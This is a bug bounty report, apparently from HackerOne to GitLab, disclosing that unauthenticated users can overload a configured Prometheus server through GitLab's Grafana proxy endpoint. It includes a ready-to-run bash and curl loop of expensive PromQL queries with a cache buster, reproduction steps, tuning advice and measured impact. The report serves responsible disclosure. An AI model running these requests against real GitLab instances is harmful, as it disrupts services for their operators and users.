DOS and high resource consumption of Prometheus server through abuse of Grafana integration proxy endpoint
HackerOne report #1723106 by joaxcar
on 2022-10-04, assigned to GitLab Team
:
Report | Attachments | How To Reproduce
Report
As I previously mentioned in my report on path traversal in the Grafana integration an unauthenticated user can DOS the configured Prometheus server by sending heavy PromQL queries to the https://gitlab.example.com/group1/project1/-/grafana/proxy/ endpoint. As this issue did not get address by the patch for the path traversal I thought that I might as well report it separately
Summary
I am no Prometheus expert, so the described scenario can probably be expanded and improved upon (from a DoS perspective). But I did force my docker container with 16 cores to work at 100% CPU constant with only 20 requests (the requests are asynchronous, meaning that the connection from the attacker to GitLab will succeed, while the connection between GitLab and Prometheus will persist). When the attack was executed, I could not restart Prometheus from the terminal with gitlab-ctl stop prometheus
as the service was unresponsive and a gitlab-ctl restart
did not fix it. I had to stop the docker container to have it stop. The impact of the attack depend somewhat on the amount of data on the Prometheus server, but as I only test this on my localhost GitLab Prometheus server it is almost empty compared to real life servers.
The setup
I booted up a GitLab Omnibus instance in a docker container, this includes a Grafana instance (https://gitlab.example.com/-/grafana) and a Prometheus instance (http://localhost:9090). I also configured SSL and a (spoofed with host file) DNS record of my server.
The Grafana instance already have the Prometheus instance as a datasource, so its possible to use this instance for test purposes. I then configured the Grafana integration in a public project, following https://docs.gitlab.com/ee/operations/metrics/embed_grafana.html .
Lets say that the project is located at https://gitlab.example.com/group1/project1 then the proxy endpoint is located at https://gitlab.example.com/group1/project1/-/grafana/proxy/ .This -/grafana/proxy have nothing to do with the Grafana instance in Omnibus, they just look similar. The datasource ID for Prometheus will probably be either 1 or 2.
You might need to run the server for a while to have some data in Prometheus. After a fresh boot I used Burp to perform a scan towards my localhost GitLab instance to fill up the server with HTTP requests, I did this two times with a spacing of 24 hours.
The attack
As an unauthenticated user, I can now DOS the Prometheus server (and possibly also affect the overall system state of the docker instance) by running this command in a terminal
for index in {1..20}
do
curl 'https://gitlab.example.com/group1/project1/-/grafana/proxy/2/api/v1/query_range?query=min_over_time(api_requests_total%5B1000h%5D)%20%25%20max_over_time(http_requests_total%5B1000h%5D)%20%25%20histogram_quantile(0.9%2C%20sum%20by%20(job)%20(rate(http_requests_total%7Bjob%3D~%22.%2B%22%7D%5B100'$index'h%5D)))&start_time=1654749435&end_time=1654771035&step=15'
done
To get it working, you might need to modify start_time
and end_time
to something relevant (use date +%s
in a terminal to get current timestamp). Also, the ID after grafana/proxy/
need to match the ID of the Prometheus datasource in Grafana. If 20 requests are not enough, try to increase the number.
In the docker image run htop
or top
to monitor the CPU
Some details
The anatomy of the requests looks like this pulled apart
https://gitlab.example.com/group1/project1/-/grafana/proxy <-- The project proxy endpoint
/2/api/v1/query_range <-- API call to Prometheus through Grafana proxy
?query= <-- Start of query
<-- An expensive query, just a mess that I made up trying to eat resources -->
min_over_time(api_requests_total%5B1000h%5D)%20%25%20max_over_time(http_requests_total%5B1000h%5D)%20%25%20histogram_quantile(0.9%2C%20sum%20by%20(job)%20(rate(http_requests_total%7Bjob%3D~%22.%2B%22%7D%5B100
$index <-- Index used as cache buster
h%5D)))&start_time=1654749435&end_time=1654771035&step=15
Important to note is that the query is arbitrary, I just tried to construct one that was heavy enough to tilt the server. This could probably be made way heavier. Also note the use of index
in the query, this is a "cache buster" that is needed as GitLab backend will not run multiple commands towards Prometheus if the query is identical.
Result
Here are some images from my test run on my local system
This is the server htop
output directly after getting 20 requests from the attacker. All 16 cores are working at 100%
This is the state of the server 5 min later, no additional requests from the attacker have been made
When accessing Grafana through the web client I can manage to get an extremely simple request to run, it usually take about 50 milliseconds to get the response. During the attack it took 1 minute.
Steps to reproduce
(if you have any other Grafana instance you can test use that one. I will describe the attack with docker GitLab omnibus)
- Boot up a docker image of the latest gitlab omnibus (see https://docs.gitlab.com/ee/install/docker.html)
- Follow this guide to enable admin login (and username/password login) on the local grafana instance https://docs.gitlab.com/omnibus/settings/grafana.html
- Log in to the new grafana instance on http://example.gitlab.com as admin
- Create an API key by visiting /-/grafana/org/apikeys make sure to generate an Admin key
- Create a new project on the GitLab instance
- Go to http://gitlab.example.com/GROUP/PROJECT/-/settings/operations and expand Grafana integration
- Configure with http://example.gitlab.com/-/grafana and the API key
- Now make sure to load the Grafana instance with some data. Make a bunch of requests to the GitLab instance over a period of time
- Take a terminal and get a shell on the docker image. Ex
docker exec -it gitlab /bin/bash
- run
top
to monitor CPU level - Now open another terminal and run
date +%s
- Take the current date and update this script starttime and endtime
for index in {1..100}
do
curl 'https://gitlab.example.com/group1/project1/-/grafana/proxy/2/api/v1/query_range?query=min_over_time(api_requests_total%5B1000h%5D)%20%25%20max_over_time(http_requests_total%5B1000h%5D)%20%25%20histogram_quantile(0.9%2C%20sum%20by%20(job)%20(rate(http_requests_total%7Bjob%3D~%22.%2B%22%7D%5B100'$index'h%5D)))&start_time=1654749435&end_time=1654771035&step=15'
done
- Run it and watch the CPU in
top
. If there is enough data in the instance all processors should spike to 100%
Impact
DOS and high resource consumption on Prometheus server
What is the current bug behavior?
There is no special permissions to run arbitrary queries (as admin, since the grafana token is admin) towards a configured Grafana instance
There are two issues, first of any user with any access to the project can execute arbitrary queries (unauthenticated users on public projects). Second, as the queries are arbitrary they can be how complex as the attacker wants and thus break the Prometheus server. A user can make over 100 requests in one go and GitLab will gladly pass them along to Grafana. Even if It looks like GitLab has a 20 or so concurrent limit, the rest are run when other finish.
What is the expected correct behavior?
Users need to be limited in what queries they are allowed to run. Or there should be an restriction on who can make the queries.
Output of checks
This bug happens on GitLab.com
Results of GitLab environment info
[Redacted]
Impact
DOS and high resource consumption on Prometheus server
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
How To Reproduce
Please add reproducibility information to this section:
Proposed solution
From #378456 (comment 1194850384):
Elevate access levels to* Reporter+
for public projects only, leaving private/protected as-is.